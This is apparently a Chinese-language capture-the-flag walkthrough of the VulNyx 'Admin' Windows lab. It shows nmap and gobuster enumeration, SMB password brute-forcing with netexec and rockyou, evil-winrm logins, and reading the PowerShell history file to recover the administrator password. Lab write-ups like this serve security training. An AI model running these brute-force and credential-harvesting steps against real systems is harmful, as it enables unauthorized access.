win系统,靶机下载地址https://vulnyx.com/file/Admin.php。
主要是windows下的信息收集。
扫描端口。
└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-04 09:46 CST
Nmap scan report for 192.168.56.143
Host is up (0.00033s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:6F:32:A3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ADMIN, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:6f:32:a3 (Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2024-11-04T07:47:21
|_ start_date: N/A
|_clock-skew: 6h00m02s
这台机器没有开ldap服务,但开了80端口,扫一下文件,只找到一个txt文件。
gobuster dir -u "http://192.168.56.143/" -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.asp,.aspx,.txt -b 401,403,404,500 -o 80.log
/tasks.txt (Status: 200) [Size: 98]
/Tasks.txt (Status: 200) [Size: 98]
/TASKS.txt (Status: 200) [Size: 98]
查看文件内容,看来是提示,并知道了用户名hope。
└─$ curl http://$IP/tasks.txt
Pending tasks:
- Finish website
- Update OS
- Drink coffee
- Rest
- Change password
By hope
知道了用户名,使用smb爆破出密码。
└─$ netexec smb $IP -u hope -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB 192.168.56.143 445 ADMIN [+] ADMIN\hope:loser
检测winrm权限,可以登录。
└─$ netexec winrm $IP -u hope -p loser
WINRM 192.168.56.143 5985 ADMIN [*] Windows 10 / Server 2019 Build 19041 (name:ADMIN) (domain:ADMIN)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 192.168.56.143 5985 ADMIN [+] ADMIN\hope:loser (Pwn3d!)
以hope用户可以进入shell,拿到user flag。
└─$ evil-winrm -i $IP -u hope -p loser
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\hope\Documents> whoami
admin\hope
上传winPEAS进行信息收集,注意到powershell的hst文件。
ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.19041.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\hope\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 234B
查看文件内容,里面给出了管理员密码。
*Evil-WinRM* PS C:\Users\hope\Documents> type C:\Users\hope\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Set-LocalUser -Name "administrator" -Password (ConvertTo-SecureString "SuperAdministrator123" -AsPlainText -Force)
以管理员密码登录,拿到root。
└─$ evil-winrm -i $IP -u administrator -p SuperAdministrator123
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\administrator\Documents> whoami
admin\administrator